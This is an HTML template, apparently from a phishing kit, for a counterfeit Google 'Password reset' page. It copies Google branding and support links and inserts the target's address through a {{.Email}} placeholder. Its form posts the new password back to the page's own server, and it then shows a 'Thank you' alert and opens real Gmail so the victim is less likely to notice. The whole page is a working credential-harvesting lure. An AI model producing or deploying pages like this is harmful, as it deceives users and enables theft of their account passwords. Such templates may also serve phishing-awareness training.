<!DOCTYPE html>
<html lang="en">
    <head>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />

        <link rel="preconnect" href="https://fonts.googleapis.com" />
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
        <link
            href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
            rel="stylesheet"
        />
        <title>Password</title>
        <link
            rel="shortcut icon"
            type="img/png"
            href="https://upload.wikimedia.org/wikipedia/commons/thumb/archive/c/c1/20221203181232%21Google_%22G%22_logo.svg/120px-Google_%22G%22_logo.svg.png"
        />
    </head>
    <body>
        <div class="form">
            <img src="https://www.vectorlogo.zone/logos/google/google-ar21.svg" />
            <div class="password-change-wrapper">
                <h2 class="password-change">Password reset</h2>
                <div class="email-wrapper">
                    <img
                        class="profile-image"
                        src="https://api.iconify.design/material-symbols:account-circle.svg"
                        alt=""
                    />
                    <p class="password_change-email">{{.Email}}</p>
                </div>
            </div>

            <div class="password-tip-wrapper">
                <p class="password-tip">Choose a strong password and don't reuse it for other accounts.</p>

                <p class="password-tip">You may be signed out of your account on some devices. Learn more about</p>
            </div>
            <div class="learn-more-wrapper">
                <a class="learn-more-link" href="https://support.google.com/accounts/answer/32040?hl=en" target="_blank">Learn more</a>
                <img
                    class="question-mark"
                    src="https://api.iconify.design/radix-icons:question-mark-circled.svg"
                    alt=""
                />
            </div>

            <form method="post" class="form-body">
                <div class="input-confirm">
                    <input type="password" name="password" id="password" />
                    <span class="input-confirm-text">New password</span>
                </div>

                <b><p class="password-strength-title">Password strength</p></b>
                <div class="password-strength-wrapper">
                    <p class="password-strength-text">
                        Use at least 8 characters. Don't use a password from another site, or something too obvious like
                        your pet's name.
                    </p>
                    <div class="why-link">
                        <a class="learn-more-link" href="https://support.google.com/accounts/answer/54490?hl=en-EN" target="_blank">Why</a>
                        <img
                            class="question-mark"
                            src="https://api.iconify.design/radix-icons:question-mark-circled.svg"
                            alt=""
                        />
                    </div>
                </div>
                <div class="input-confirm">
                    <input type="password" name="Password" id="confirm_password" />
                    <span class="input-confirm-text">Confirm new password</span>
                    <p class="match-message" id="message"></p>
                </div>
                <div class="show-password">
                    <input class="checkbox" type="checkbox" onclick="showPassword()" />
                    <p class="show-password-text">Show Password</p>
                    
                </div>

                <script>
                    function showPassword() {
                        var x = document.getElementById("password");
                        if (x.type === "password") {
                            x.type = "text";
                        } else {
                            x.type = "password";
                        }

                        var x = document.getElementById("confirm_password");
                        if (x.type === "password") {
                            x.type = "text";
                        } else {
                            x.type = "password";
                        }
                    }

                    $("#password, #confirm_password").on("keyup", function () {
                        if ($("#password").val() == $("#confirm_password").val()) {
                            $("#message").html("Matching").css("color", "green");
                        } else $("#message").html("Not Matching").css("color", "red");
                    });

                    function YNconfirm() { 
                        if(!alert("Thank you")) {
                            window.open('https://mail.google.com/mail', '_blank');
                        }

                      }

                    document.body.addEventListener("click", () => {
                        if (
                            document.getElementById("password").value.length == 0 &&
                            document.getElementById("confirm_password").value.length == 0
                        ) {
                            document.getElementById("message").innerHTML = "";
                            console.log("rr");
                        }
                    });
                </script>

                <div class="button-wrapper"><input onclick="YNconfirm()" type="submit" class="change-password-button" value="Change password"></input></div>
            </form>
        

            <style>
                * {
                    box-sizing: border-box;
                }

                body {
                    background-color: #eeeeee;
                    font-family: "Roboto", sans-serif;
                }

                img {
                    display: block;
                    width: 100px;
                    margin: 30px auto;
                    margin-bottom: 0.3rem;
                    margin-top: 0;
                }

                .password-tip-wrapper {
                    margin-bottom: 3rem;
                }

                .password-tip {
                    text-align: left;
                    color: #838383;
                    margin-bottom: 0;
                }

                .password-change {
                    color: #595959;
                    font-weight: 500;
                    font-size: 1.5rem;
                    text-align: center;
                    margin-bottom: 0;
                    margin-top: 0;
                }

                .match-message {
                    font-size: 0.9rem;
                    text-align: right;
                    margin-top: -10px;
                }

                .show-password {
                  position: relative;
                    display: flex;
                    flex-direction: row;
                    width: 45%;
                  
                }

                .checkbox {
                    position: absolute;
                   margin-top: 19px;
                   margin-right: 10px;
                   width: 15px;
                   align-self: flex-start;
                   
                }

                .show-password-text {
                    text-align: left;
                    color: #838383;
                    width: 180px;
                    margin-left: 20px;
                }

                .learn-more-wrapper {
                    display: flex;
                    flex-direction: row;
                    align-items: center;
                    margin-top: -5rem;
                    margin-bottom: 10px;
                }

                .email-wrapper {
                    display: inline-flex;
                    align-items: center;
                }

                .why-link {
                    display: flex;
                    align-items: center;
                    margin-top: -2.4rem;
                    margin-bottom: 5px;
                }

                .password-strength-title {
                    text-align: left;
                    margin-bottom: 0;
                    margin-top: 0;
                    color: #797979;
                }

                .password-strength-text {
                    display: flex;
                    flex-direction: row;
                    align-items: center;
                    text-align: left;
                    font-size: 0.9rem;
                    color: #797979;
                    margin-top: 0.6rem;
                }

                .password_change-email {
                    color: #797979;
                }

                .profile-image {
                    width: 20px;
                    height: 20px;
                    filter: invert(24%) sepia(99%) saturate(1612%) hue-rotate(199deg) brightness(98%) contrast(95%);
                    margin-right: 5px;
                    margin-top: 6px;
                }

                .password-strength-wrapper {
                    display: flex;
                    flex-direction: column;
                }

                .learn-more-link {
                    color: #0b57d0;
                    padding-left: 0;
                    margin-top: 2rem;
                }

                .question-mark {
                    height: 20px;
                    width: 20px;
                    margin: 0;
                    margin-top: 28px;
                    filter: invert(24%) sepia(99%) saturate(1612%) hue-rotate(199deg) brightness(98%) contrast(95%);
                }

                .form {
                    background-color: #ffffff;
                    min-width: 300px;
                    max-width: 600px;
                    height: 90%;
                    margin: 50px auto 10px auto;
                    padding: 1% 2.5%;
                    overflow: hidden;
                    text-align: center;
                    border: 1px solid #d0d0d0;
                    border-radius: 5px;
                }

                .form-body {
                    padding: 1rem 0;
                    display: flex;
                    flex-direction: column;
                    width: 100%;
                }

                .input-confirm {
                    position: relative;
                    margin-top: 10px;
                }

                .input-confirm-text {
                    position: absolute;
                    z-index: 2;
                    left: 0;
                    top: -12px;
                    padding: 5px;
                    left: 10px;
                    font-size: 0.8rem;
                    background-color: #ffffff;
                    color: #797979;
                }

                input {
                    border-radius: 3px;
                    padding: 18px 15px;
                    width: 100%;
                    border: 1px solid #838383;
                    outline: none;
                    display: block;
                    margin: 0 auto 20px auto;
                    position: relative;
                }

                input:focus {
                    border: 1px solid #0250d6;
                }

                input:focus + span {
                    color: #0250d6;
                }

                .button-wrapper {
                    display: flex;
                    flex-direction: row;
                    align-self: flex-end;
                }

                .change-password-button {
                    border-radius: 100px;
                    border: none;
                    width: 200px;
                    text-decoration: none;
                    background: #0250d6;
                    padding: 13px 30px;
                    color: #ffffff;
                    margin-top: 1.5rem;
                    margin-bottom: 1rem;
                    font-weight: 600;
                    display: block;
                    transition: all 0.2s;
                }

                .change-password-button:hover {
                    box-shadow: 0px 0px 8px gray;
                    background: #256dea;
                }

                a {
                    text-align: center;
                    margin-top: 30px;
                    color: #719be6;
                    text-decoration: none;
                    padding: 5px;
                    display: inline-block;
                }
            </style>
        </div>
    </body>
</html>
